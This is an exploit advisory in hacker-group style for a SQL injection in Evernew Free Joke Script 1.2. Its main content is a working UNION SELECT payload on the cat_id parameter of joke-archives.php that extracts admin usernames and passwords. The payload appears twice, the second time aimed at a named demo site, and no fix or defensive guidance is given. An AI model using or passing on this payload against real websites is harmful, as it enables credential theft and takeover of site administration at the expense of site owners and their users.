Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability

2009-05-27 21:00:27

@~~=======================================~~@
============taRentReXx===================
The Indian Hacker
@~~=======================================~~@

@~~=Author : taRentReXx

@~~=Email : [email protected]

@~~===============INDIAN=================~~@


@~~=======================================~~@
@~~=Script : Evernewjoke Script

@~~=S.Site : http://www.evernewscripts.com/2009/02/free-joke-script/

@~~=Demo : http://www.evernewjokes.com/
@~~=======================================~~@



@~~=Vul file :joke-archives.php

@~~=Exploit :-

joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--


!! DEMO !!:-

http://www.evernewjokes.com/joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--



@~~=======================================~~@
@~~=======================================~~@

Greetz to all muslims brothers.
to all indians
to milw0rm

@~~===============INDIAN=================~~@

#

Fixes

No fixes

In order to submit a new fix you need to be registered.